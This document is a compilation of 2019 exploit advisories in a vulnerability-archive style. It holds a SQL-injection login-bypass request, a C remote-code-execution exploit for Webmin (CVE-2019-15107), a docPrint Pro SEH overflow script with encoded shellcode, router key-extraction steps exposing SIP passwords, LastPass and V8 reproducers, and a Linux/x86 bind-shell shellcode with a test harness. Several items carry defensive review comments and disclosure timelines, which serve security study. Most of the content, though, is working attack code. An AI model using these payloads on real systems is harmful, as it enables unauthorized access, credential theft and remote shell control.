
College-Management-System 1.2 Authentication Bypass


College-Management-System version 1.2 suffers from an authentication bypass vulnerability.


MD5 | fa778ad9f551c430055144e6c1752b32

# Exploit Title: College-Management-System 1.2 - Authentication Bypass
# Author: Cakes
# Discovery Date: 2019-09-14
# Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System
# Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip
# Tested Version: 1.2
# Tested on OS: CentOS 7
# CVE: N/A

# Description:
# Easy authentication bypass vulnerability on the application
# allowing the attacker to log in as the school principal.

# Simply replay the below Burp request or use Curl.
# Payload: ' or 0=0 #

POST /college/principalcheck.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/college/principalcheck.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

emailid='%20or%200%3d0%20#&pass=asdf


Webmin 1.920 Remote Code Execution


Webmin version 1.920 remote code execution exploit that leverages the vulnerability noted in CVE-2019-15107.


MD5 | 4a84bafb5f4c4384a734db4fa8f37fb5

////////////////////////////////////////////////////////////////////////////////////////////////
// Webmin 1.920 Remote Code Execution Exploit CVE_2019_15107.c muBoT Cut
// written in C by BoSSaLiNiE
//
// Step 1
// wget https://netix.dl.sourceforge.net/project/webadmin/webmin/1.920/webmin_1.920_all.deb
//
// Step 2
// dpkg -i webmin_1.920_all.deb
//
//
// Step 3
// sed -i s/passwd_mode=0/passwd_mode=2/g /etc/webmin/miniserv.conf;service webmin restart
//
// Step 4
// gcc CVE_2019_15107.c -o CVE_2019_15107 -lcurl
//
// ./CVE_2019_15107 10.0.0.14 "uptime"
// https://10.0.0.14:10000/password_change.cgi
// 16:16:38 up 22:15, 0 user, load average: 0.00, 0.00, 0.00
//
///////////////////////////////////////////////////////////////////////////////////////////////

#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include <netinet/in.h>
#include <net/if.h>
#include <arpa/inet.h>

int main(int argc,char* argv[])
{
/*
 * Sends a single crafted POST to <argv[1]>:10000/password_change.cgi and
 * prints whatever the server echoes back between two fixed marker strings
 * (in the header's example, the output of the supplied command).
 *
 * argv[1]: target host, interpolated into the URL and Referer.
 * argv[2]: value placed verbatim into the `old` form field.
 * argc is never checked, so running with fewer than two arguments passes a
 * NULL argv entry to sprintf() below.
 *
 * Review notes (defensive reading):
 *  - TLS verification is switched off near the end of the option setup
 *    (VERIFYPEER/VERIFYHOST = 0 override the 1L set first), so the request
 *    is sent to any host presenting any certificate.
 *  - url/ref are 100-byte stack buffers filled with sprintf() from argv[1]
 *    with no length check.
 *  - puts(target) is not covered by the `if (target)` guard (see below).
 *  - The curl handle, header list and global state are never cleaned up;
 *    harmless in a one-shot process but worth knowing.
 */
CURLU *h;                    /* unused */
CURL *curl;
CURLcode res;                /* set by curl_easy_perform() but never examined */
struct sockaddr_in servaddr; /* socket address structure -- unused */
curl_socket_t sockfd;        /* unused */

char buffer[200];            /* unused */
char scanip[20];             /* unused */
char *host;                  /* unused */
char *path;                  /* unused */
char ref[100];               /* Referer value, filled by sprintf() below */
char url[100];               /* request URL, filled by sprintf() below */


/* Growable, NUL-terminated heap buffer for the response body. */
struct string {
char *ptr;   /* heap buffer, always NUL-terminated */
size_t len;  /* bytes stored, excluding the terminating NUL */
};

/*
 * Function definitions nested inside main() are a GCC extension; a strict
 * ISO C compiler rejects this file.  <stdio.h> is not included directly
 * (only via curl/curl.h, presumably), yet fprintf/puts are used.
 */
void init_string(struct string *s) {
s->len = 0;
s->ptr = malloc(s->len+1);
if (s->ptr == NULL) {
fprintf(stderr, "malloc() failed\n");
exit(EXIT_FAILURE);
}
s->ptr[0] = '\0';
}

/*
 * CURLOPT_WRITEFUNCTION callback: appends size*nmemb bytes from ptr to *s.
 * Returns the number of bytes consumed, as libcurl requires.  On realloc()
 * failure the old block is not freed, but the process exits right away.
 */
size_t writefunc(void *ptr, size_t size, size_t nmemb, struct string *s)
{
size_t new_len = s->len + size*nmemb;
s->ptr = realloc(s->ptr, new_len+1);
if (s->ptr == NULL) {
fprintf(stderr, "realloc() failed\n");
exit(EXIT_FAILURE);
}
memcpy(s->ptr+s->len, ptr, size*nmemb);
s->ptr[new_len] = '\0';
s->len = new_len;

return size*nmemb;
}


curl_global_init(CURL_GLOBAL_DEFAULT);
curl = curl_easy_init();

if(curl) {
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 1L);   /* overridden to 0 further down */
struct curl_slist *headers=NULL;


struct string s;
init_string(&s);

/*
 * Fixed header set.  The static Cookie value and the misspelled
 * "Content-Lenght" header are sent verbatim on every run (libcurl derives
 * the real Content-Length from CURLOPT_POSTFIELDS), which makes this
 * request easy to fingerprint in proxy or web-server logs.
 */
headers = curl_slist_append(headers, "Accept-Encoding: gzip, deflate");
headers = curl_slist_append(headers, "Accept: */*");
headers = curl_slist_append(headers, "Accept-Language: en");
headers = curl_slist_append(headers, "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)");
headers = curl_slist_append(headers, "Connection: close");
headers = curl_slist_append(headers, "Cookie: redirect=1; testing=1; sid=x; sessiontest=1");
// headers = curl_slist_append(headers, "Referer: https://192.168.233.134:10000/session_login.cgi");
headers = curl_slist_append(headers, "Content-Type: application/x-www-form-urlencoded");
headers = curl_slist_append(headers, "Content-Lenght: 60");
headers = curl_slist_append(headers, "cache-control: no-cache");

/* No bound on argv[1]: a host string longer than the remaining room overflows url/ref (100 bytes each). */
sprintf(url, "https://%s:10000/password_change.cgi", argv[1]);
sprintf(ref, "https://%s:10000/session_login.cgi", argv[1]);

curl_easy_setopt(curl, CURLOPT_REFERER, ref);
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers );
curl_easy_setopt(curl, CURLOPT_VERBOSE, 0);   /* option takes a long; 0L would be the correct literal */
curl_easy_setopt(curl, CURLOPT_URL, url);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writefunc);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &s);

/* 100000-byte stack array; the name is misleading, nothing here is base64. */
char b64str[100000] = {0};
/*
 * argv[2] goes unencoded into the `old` field alongside expired=2; this is
 * the request the header comment associates with CVE-2019-15107.  For
 * detection: a POST to password_change.cgi whose `old` value is not a
 * plausible password is the observable signal.
 */
sprintf(b64str, "user=rootxx&pam=&expired=2&old=%s&new1=test2&new2=test2",argv[2]);

curl_easy_setopt(curl, CURLOPT_CUSTOMREQUEST, "POST");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, b64str);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0);   /* disables certificate verification (overrides the 1L above) */
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0);   /* disables hostname verification */
// curl_easy_setopt (curl, CURLOPT_TIMEOUT, 10L);

res = curl_easy_perform(curl);   /* return code ignored; on failure s.ptr stays "" and nothing is found below */

//////////////////////////FILTER//////////////////////////

// puts(s.ptr);
/*
 * Extract the text between PATTERN1 (the start of the server's
 * "current password is incorrect" error message) and PATTERN2.
 */
const char *x = s.ptr;
const char *PATTERN1 = "<center><h3>Failed to change password : The current password is incorrect";
const char *PATTERN2 = "</h3></center>";

char *target = NULL;
char *start, *end;

if ( start = strstr( x, PATTERN1 ) )   /* assignment used as condition (intentional) */
{
start += strlen( PATTERN1 );
if ( end = strstr( start, PATTERN2 ) )
{
target = ( char * )malloc( end - start + 1 );   /* result unchecked */
memcpy( target, start, end - start );
target[end - start] = '\0';
}
}

/*
 * Only puts(url) is inside the if; puts(target) runs unconditionally and
 * receives NULL when the markers were not found -- undefined behaviour,
 * in practice a crash.
 */
if ( target )
puts(url);
puts( target );

free( target );   /* free(NULL) is a no-op */

free(s.ptr);


}
return 0;
}


AppXSvc 17763.1.amd64fre.rs5_release.180914-1434 Privilege Escalation


AppXSvc version 17763.1.amd64fre.rs5_release.180914-1434 suffers from an arbitrary file security descriptor overwrite privilege escalation vulnerability.


MD5 | bcc6ebfdae931fcb8e576b663d612f88


docPrint Pro 8.0 SEH Buffer Overflow


docPrint Pro version 8.0 suffers from a SEH buffer overflow vulnerability.


MD5 | 5308c4595d22a62a948464471901acc2

import struct
# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: September 14th, 2019
# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io)
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10 and Windows 7


# TO RUN:
# 1. Create a blank file named "test.pdf"
# 2. Open doc2pdf_win.exe
# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File"
# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay"
# 5. Click "Add File(s)"
# 6. Select the "test.pdf" file created from step 1.
# 7. Press on "Start" and name the file "exploit.pdf"

# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII)

# Zero out registers for calculations.
# Two ANDs with disjoint masks (0x01010101 and 0x10101010) clear eax using
# only bytes that the application passes through unchanged.
zero = "\x25\x01\x01\x01\x01"   # and eax, 0x01010101
zero += "\x25\x10\x10\x10\x10"  # and eax, 0x10101010

# Stack alignment: copy esp into eax, adjust it with three subtractions
# (presumably split because one combined constant would contain a bad
# byte), and load the result back into esp so the dwords pushed by the
# decoder below land where execution will reach them -- TODO confirm offset.
alignment = "\x54"                  # push esp
alignment += "\x58"                 # pop eax
alignment += "\x2d\x1a\x50\x55\x55" # sub eax, 0x1a505555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x50"                 # push eax
alignment += "\x5c"                 # pop esp

# Custom created and encoded MessageBox POC shellcode.
# Utilized application DLL with no ASLR for Windows API call to MessageBox function.
# Decoded form (8 dwords).  Each group below zeroes eax, subtracts three
# constants whose sum (mod 2^32) yields one dword, and pushes it; the
# dwords are pushed last-first so they end up in this order on the stack:
# \x31\xc0\x50\x68
# \x42\x41\x4a\x41
# \x89\xe1\x50\x68
# \x42\x41\x4a\x41
# \x89\xe2\x50\x50
# \x51\x52\x50\xbe
# \x38\x20\x00\x10
# \xff\xe6\x41\x41

# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!)
shellcode = zero                    # zero out eax
shellcode += "\x2d\x55\x15\x4f\x53" # sub eax, 0x534f1555
shellcode += "\x2d\x55\x02\x4f\x53" # sub eax, 0x534f0255
shellcode += "\x2d\x57\x01\x50\x53" # sub eax, 0x53500157
shellcode += "\x50"                 # push eax

# 4F554A42 4F554A42 51554B44
shellcode += zero                   # zero out eax
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x44\x4b\x55\x51" # sub eax, 0x51554b44
shellcode += "\x50"                 # push eax

# 153A393A 153A393A 173B3B3B
shellcode += zero                   # zero out eax
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a (bytes 3a 39 3a 15 little-endian)
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a
shellcode += "\x2d\x3b\x3b\x3b\x17" # sub eax, 0x173b3b3b
shellcode += "\x50"                 # push eax

# 3A3A1927 3A3A0227 3B3B0229
shellcode += zero                   # zero out eax
shellcode += "\x2d\x27\x19\x3a\x3a" # sub eax, 0x3a3a1927
shellcode += "\x2d\x27\x02\x3a\x3a" # sub eax, 0x3a3a0227
shellcode += "\x2d\x29\x02\x3b\x3b" # sub eax, 0x3b3b0229
shellcode += "\x50"                 # push eax

# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero                   # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50"                 # push eax

# 323A1A27 323A0227 333B0229
shellcode += zero                   # zero out eax
shellcode += "\x2d\x27\x1a\x3a\x32" # sub eax, 0x323a1a27
shellcode += "\x2d\x27\x02\x3a\x32" # sub eax, 0x323a0227
shellcode += "\x2d\x29\x02\x3b\x33" # sub eax, 0x333b0229
shellcode += "\x50"                 # push eax

# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero                   # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50"                 # push eax

# 323A1545 323A1545 333B1545
shellcode += zero                   # zero out eax
shellcode += "\x2d\x45\x15\x3a\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3A\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3b\x33" # sub eax, 0x333b1545
shellcode += "\x50"                 # push eax

# Let's roll.
# Layout: filler up to the SEH record, nSEH = two short jumps (JO/JNO, +6)
# over the handler slot, SEH handler = pop/pop/ret gadget in reg.dll (a
# module the author notes is not ASLR-protected -- SafeSEH or ASLR on that
# module would invalidate the fixed address), 2 bytes of padding, the esp
# adjustment, the SUB-encoded shellcode, then 'E' filler to 6000 bytes.
payload = "\x41" * 1676
payload += "\x70\x06\x71\x06"            # JO 6 bytes. If fails, JNO 6 bytes
payload += struct.pack('<L', 0x10011874) # pop ebp pop ebx ret reg.dll (Python 2 str; under Python 3 this is bytes and the concatenation raises TypeError)
payload += "\x41" * 2                    # Padding to reach alignment
payload += alignment
payload += shellcode
payload += "\x45" * (6000-len(payload))  # pad to a fixed total length

# Write to file (text mode; no byte above is 0x0a, so newline translation is not an issue)
f = open('bajablast.txt', 'w')
f.write(payload)
f.close()

Inteno IOPSYS Gateway 3DES Key Extraction Improper Access


Inteno EG200 routers with firmware versions EG200-WU7P1U_ADAMO3.16.4-190226_1650 and below have a JUCI ACL misconfiguration that allows the "user" account to extract the 3DES key via JSON commands to ubus. The 3DES key is used to decrypt the provisioning file provided by Adamo Telecom on a public URL via cleartext HTTP.


MD5 | 42d98d4eb695d10843154434df1ef4f3

# Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions
# Date: 2019-06-29
# Exploit Author: Gerard Fuguet (gerard@fuguet.cat)
# Vendor Homepage: https://www.intenogroup.com/
# Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650
# Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937
# Affected Component: SIP password, Info Gathering of Network Config
# Attack Type: Remote
# Tested on: Kali Linux 2019.2 against an Inteno EG200 Router
# CVE : CVE-2019-13140

# Description:
Inteno EG200 routers running firmware EG200-WU7P1U_ADAMO3.16.4-190226_1650
and earlier have a JUCI ACL misconfiguration that allows
the "user" account to extract the 3DES key via JSON commands to ubus.
The 3DES key is used to decrypt the provisioning file provided by
Adamo Telecom on a public URL via cleartext HTTP.

# Attack Vectors:
For the exploitation to succeed, two components are needed: 1.
the encrypted file (.enc) and 2. the 3DES key to decrypt it. The
encrypted file can be downloaded via the HTTP URL offered by Adamo ISP
(works from any external network). It is then necessary to interact with the
router using the WebSocket protocol to obtain the 3DES key; a web browser
like Firefox can be used as a WebSocket client via its developer
tools. The session id is acquired with the same username and password as
the router (in this case, the password is the same as the wifi default). Once
the 3DES key is obtained through a JSON request command, the .enc file can be
decrypted with the help of the openssl tool.

# PoC:
Step 1: Getting the provisioning file
Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc
Where XXXXXXXXXXXX is your router’s Inteno MAC, all in capitals and without
the colons. You can also get your MAC by doing a ping to the router
and then an arp command on terminal.
Step 2: The 3DES Key
Let's communicate over WebSockets
- Using Firefox, open the router’s webpage (192.168.1.1 by default).
- Invoke the developer tools by pressing F12 and go to the Console Tab.
- Let’s create the WebSocket:
var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json")
- And creating the Log for show responses in each petition:
superSocket.onmessage = function (event) {console.log(event.data)}
- We request a session ID with the same login parameters used to access
the router’s website. (put your router's wifi password in place of the
wifis-password value):
superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666}))
- Now you will obtain a response; the value of the parameter named
“ubus_rpc_session” is your session’s ID. Copy it for use in the next
request call.
- Requesting information about the router’s System. (put your session ID
instead of put-your-session-id-here value):
superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999}))
- On the response obtained, copy the value of the “des” parameter.
It’s 16 digits that we need to convert to hexadecimal.
Step 3: Ready for Decrypting
Convert to HEX using xxd tool where XXXXXXXXXXXXXXXX is your "des" key:
echo -n XXXXXXXXXXXXXXXX | xxd -p
- Use openssl tool to decrypt your provisioning file. (Put your "des" key
instead of your-des-key-in-hex-format value and the XXXXXXXXXXXX
refers the name of your encryption provisioning file, in the -out
value, the name can be different):
openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz
- Uncompress the decrypted file:
tar -xzvf XXXXXXXXXXXX.tar.gz
- You get the file: Provisioning.conf.
- Showing the file:
cat Provisioning.conf
- The end of the line refers to the secret, the password of your
SIP account.
A video was created to show all these Steps in action:
https://youtu.be/uObz1uE5P4s

# Additional Information:
A packet sniffer like Wireshark can be used to retrieve the 3DES key
instead of using the WebSocket communication protocol. In that case, the user
needs to log in on the router's page, and the JSON request
containing the 3DES key will then be captured.

# References:
https://twitter.com/GerardFuguet/status/1169298861782896642
https://www.slideshare.net/fuguet/call-your-key-to-phone-all

# Timeline:
2019-06-29 - White Paper done
2019-07-01 - CVE assigned
2019-07-09 - Notified to Inteno
2019-07-11 - Adamo aware and ask for detailed info
2019-07-12 - Info facilitated
2019-07-25 - Early patch available and applied (Cooperation starts)
2019-07-26 - Tested and failed (VoIP not working)
2019-08-27 - New firmware available
2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router
2019-08-31 - Tested OK
2019-09-04 - Disclosure published

LastPass Credential Leak From Previous Site


LastPass suffers from an issue where bypassing do_popupregister() leaks credentials from the previous site.


MD5 | 868ccacf1a79234f0073d4e84c526158

lastpass: bypassing do_popupregister() leaks credentials from previous site

I noticed that you can create a popup without calling do_popupregister() by iframing popupfilltab.html (i.e. via moz-extension, ms-browser-extension, chrome-extension, etc). It's a valid web_accessible_resource.

Because do_popupregister() is never called, ftd_get_frameparenturl() just uses the last cached value in g_popup_url_by_tabid for the current tab. That means via some clickjacking, you can leak the credentials for the previous site logged in for the current tab.

I don't consider this a *critical* issue, because I don't think there's a way to control which site you leak credentials from (just the last visited site), but it does seem serious enough to fix.

To reproduce the issue:

1. Go to a site you have credentials saved for and click the little "..." icon.
2. Go to https://example.com
3. Enter this in the console:

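// Reproducer from the report: the extension's popupfilltab.html is a
// web_accessible_resource, so an ordinary web page can embed it in an
// iframe and the popup appears without do_popupregister() having run for
// this page.  The quotes were mis-escaped (\") in the original transcript.
y = document.createElement("iframe");
y.height = 1024;
y.width = "100%";
y.src = "chrome-extension://hdokiejnpimakedhajhdlcegeplioahd/popupfilltab.html";
// or y.src = "moz-extension://...";
// or y.src = "ms-browser-extension://...";
document.body.appendChild(y);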


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.





Found by: taviso@google.com


Master Data Online Cross Site Request Forgery / Data Tampering

V8 Map Migration Type Confusion


V8 map migration does not respect element kind, leading to a type confusion vulnerability.


MD5 | f6ab8a5e41409debf546a94e0e445037

v8 Map migration doesn't respect element kind, leading to type confusion

The following sample, found by Fuzzilli and manually simplified, crashes d8 built from HEAD in both debug and release configuration:

// Crash reproducer (Fuzzilli-found, manually reduced).  Per the report, the
// final element store on v2 triggers a map migration that keeps v2's
// FixedArray-backed elements while the new map expects DICTIONARY_ELEMENTS.
// Statement order is load-bearing; do not reorder.
function main() {
const v2 = {foo:1.1};
Object.seal(v2);
Object.preventExtensions(v2);
Object.freeze(v2);             // report: v2 ends up with fast HOLEY_FROZEN_ELEMENTS
const v12 = {foo:2.2};
Object.preventExtensions(v12);
Object.freeze(v12);
const v18 = {foo:Object};      // report: creating v18 deprecates the map v2 still uses
v12.__proto__ = 0;             // report: the modified prototype is why dictionary elements are expected later
v2[5] = 1;                     // report: IC miss -> JSObject::MigrateInstance with the element kind unaccounted for
}
main();

In release builds, this sample will often crash when dereferencing an invalid address. In debug builds this will crash with a failed DCHECK: "# Debug check failed: fixed_array.IsNumberDictionary(isolate)". Another DCHECK can be triggered earlier on when the --verify-heap flag is used.

I have only very briefly analyzed this crash. Roughly what appears to be happening is that during the IC cache miss caused by the final element store, v2 is transitioned to a new Map (as the old one was deprecated when v18 was created). During that transition, happening in JSObject::MigrateInstance, v8 somehow fails to account for the changed element kind, which in this case switches from fast elements ([HOLEY_FROZEN_ELEMENTS]) to DICTIONARY_ELEMENTS (which are now used due to the modified prototype). As such, afterwards, v8 assumes that the elements_ pointer of v2 point to a NumberDictionary while in reality it still points to a FixedArray. A type confusion follows. As the content of the FixedArray (and its size) are controllable during this crash, I assume this bug to be exploitable.
In release builds, this PoC then appears to crash when v8 tries to fetch an element from the thought-to-be dictionary as the size of the dictionary (really the first element in the FixedArray) is some large number.

According to clusterfuzz, this bug affects current Stable and Beta releases.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.





Found by: saelo@google.com



Microsoft Windows Internet Settings Security Feature Bypass


Microsoft Windows suffers from an Internet Settings misconfiguration security feature bypass vulnerability. Versions affected include Windows 7 SP1, 8.0, 8.1 x86 and x64 with full patches up to July 2019.


MD5 | ff0c1e4363db410575808afd701e6662

# Exploit Title:  Microsoft Windows 'Internet Settings' Misconfiguration Security Feature Bypass Vulnerability

# Google Dork: N/A

# Date: September, 17 2019

# Exploit Author: Eduardo Braun Prado

# Vendor Homepage: http://www.microsoft.com/

# Software Link: http://www.microsoft.com/

# Version: Windows 7 SP1, 8.0, 8.1 x86 and x64 with full patches up to July 2019

# Tested on: Windows 7 SP1, 8.0, 8.1 x86 and x64 with full patches up to July 2019

# CVE : n/a


Details: A recent setting has been introduced to the 'Internet settings' of Windows that applies to MS IE and several programs that utilize its libraries,

and which can enable or disable the VBScript engine on a per-zone basis. On the Registry:


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\X


value: 140C

type: DWORD

data: 0 (0= allow | 1= prompt | 3 = disallow)

where 'X' is an integer between 0 and 4, and they are related to security zones. It's permitted by default on 'Local Intranet', 'Trusted Sites' and 'Local Machine' and disabled by default on 'Internet' and 'Restricted Sites'.


The misconfiguration issue happens because on the affected Windows versions, the setting was defined to '0' (Allow) when it should be '3' (disallow).

The impact is permitting web pages to invoke VBScript engine on security zones that should not be allowed.


To make sure this setting is on its default on all supported OSes, one can run the following commands (from eg. 'Run' menu or CMD prompt)

%comspec% /k reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" /v 140C /t REG_DWORD /d 3 /f

%comspec% /k reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" /v 140C /t REG_DWORD /d 3 /f

%comspec% /k reg add "HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" /v 140C /t REG_DWORD /d 3 /f


Vendor was contacted on July 11, 2019.

Vendor replied on July 15, 2019 saying the issue was successfully reproduced and would be fixed on August, 2019 monthly patch.

Officially patched on August, 2019 (on the cumulative update for MS IE)


Warning: on Windows 7 machines, it might be necessary to run the above commands because the setting is also defined under the HKEY_CURRENT_USER registry key, which takes precedence over HKEY_LOCAL_MACHINE.


Google Chrome Password Disclosure


Google Chrome suffers from an issue where it will leak all passwords for a given domain.


MD5 | c0ba33b4678f84c5a95f89a364a6fa19

---------------------------
Packet Storm Editor's Note: To normally view passwords in Chrome, you have to go to the Properties section, click View Passwords, and you are prompted for a users password. This flaw discloses all passwords for the domain without the required authentication step.
---------------------------

Please see https://secureli.com/2019/09/15/password-leak-version-76-0-3809-132-official-build-64-bit/ for all information, including pictures:

When a plain-text password form field is found by Google Chrome, it will reveal all passwords on that primary domain.

For example, take a look at the following code and screenshot:

<input class="form-control secure_password required password fs-hide" data-install-name="secureli" id="ftp_user_pass_new" required="required" aria-required="true" autocomplete="new-password" type="text" name="ftp_user[pass]">
By checking the “Show Password” button, as shown below…

--- screenshot ---

…the auto-complete function in Chrome is activated and clicking on the password field shows a drop-down of all passwords saved on that domain:

--- screenshot ---




Linux/x86 Bind TCP Port 43690 Null-Free Shellcode


53 bytes small Linux/x86 bind TCP port 43690 null-free shellcode.


MD5 | f345374aa9c5b98d69c4892457777ca6

#---------------------- DESCRIPTION -------------------------------------#

; Title: Linux/x86 bind tcp shellcode (port 43690) null-free
; Author: Daniel Ortiz
; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
; Size: 53 bytes  ; NOTE(review): the assembled string in shellcode.c below holds 106 bytes, not 53
; SLAE ID: PA-9844
;
; Overview: four socketcall(2) sub-calls (socket, bind, listen, accept)
; made through int 0x80 with eax=102, then dup2() of the accepted fd over
; fds 2,1,0 and execve("/bin//sh").  The "null-free" property comes from
; using 8-bit register writes (al/bl/cl) and sign-extended byte immediates
; instead of 32-bit constants containing 0x00.  Port 0xAAAA (43690) reads
; the same in either byte order.



section .DATA

section .BSS


section .TEXT

global _start

_start:

; int socket(int domain, int type, int protocol);
; socketcall args are pushed in reverse so ecx ends up pointing at
; {domain, type, protocol} on the stack.

xor eax, eax
xor ebx, ebx
cdq                ; edx = 0 (sign of eax); reused below as the NULL/zero value

push eax ; protocol - 0
push byte 0x1 ; type - SOCK_STREAM
push byte 0x2 ; domain - AF_INET

mov ecx, esp
inc bl ; sys_socket
mov al, 102 ; socketcall system call
int 0x80

mov esi, eax ; save the socketfd

; bind(soc, (struct sockaddr *)&srv_addr, 0x10)
; Only 8 of the 16 bytes of sockaddr_in are written (sin_addr=0 i.e.
; INADDR_ANY, sin_port=0xAAAA, sin_family=2); the 0x10 length makes the
; kernel read sin_zero from whatever already sits above on the stack.


push edx
push word 0xAAAA
push word 2
mov ecx, esp
push byte 0x10 ; last argument
push ecx ; pointer to the structure
push esi ; socketfd
mov ecx, esp
inc bl ; bl contains 2
mov al, 102
int 0x80


; int listen(int sockfd, int backlog);
; backlog = edx = 0

push edx
push esi
mov ecx, esp
mov bl, 0x4 ; bl contains 4
mov al, 102
int 0x80

; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
; addr = addrlen = NULL; the returned client fd is kept in ebx for dup2

push edx
push edx
push esi ; socketfd
mov ecx, esp
inc bl ; bl contains 5
mov al, 102
int 0x80
mov ebx, eax

; int dup2(int oldfd, int newfd);
; Loop: ecx = 2, 1, 0 -> dup2(client_fd, ecx).  The jnz relies on ZF from
; `dec cl` surviving the int 0x80.

xor ecx, ecx
mov cl, 3
l00p:
dec cl
mov al, 63
int 0x80
jnz l00p


; int execve(const char *filename, char *const argv[],char *const envp[])
; ebx -> "/bin//sh\0"; ecx -> {NULL} (argv[0] is NULL); edx = NULL envp

push edx
push long 0x68732f2f
push long 0x6e69622f
mov ebx, esp
push edx
push edx
mov ecx, esp
mov al, 0x0b
int 0x80


; exit syscall -- exit(8); only reached if execve fails
xor eax, eax
mov al, 0x1
mov bl, 0x8
int 0x80

/*

shellcode.c program

*/

#include<stdio.h>
#include<string.h>

/*
 * Assembled bytes of the listing above as a C string (106 escaped bytes as
 * printed; the header's "53 bytes" does not match this count).  No byte is
 * 0x00, so strlen() in main() reports the full length.
 */
unsigned char code[] = \

"\x31\xc0\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\xfe\xc3\xb0\x66"
"\xcd\x80\x89\xc6\x52\x66\x68\xaa\xaa\x66\x6a\x02\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x52\x56\x89\xe1\xb3\x04"
"\xb0\x66\xcd\x80\x52\x52\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89"
"\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x52\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x52\x89\xe1\xb0\x0b"
"\xcd\x80\x31\xc0\xb0\x01\xb3\x08\xcd\x80";


/*
 * Test harness: prints the length of code[] and then jumps into it.
 * Notes: `main()` without a return type relies on implicit int (removed
 * in C99); strlen() returns size_t, so "%d" should be "%zu"; jumping into
 * a writable data array only works where that segment is executable
 * (typically a build with -z execstack), which is a property the harness
 * depends on, not the shellcode.
 */
main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;   /* treat the byte array as a function */

ret();   /* does not return normally: the listing ends in exit(8) */

}

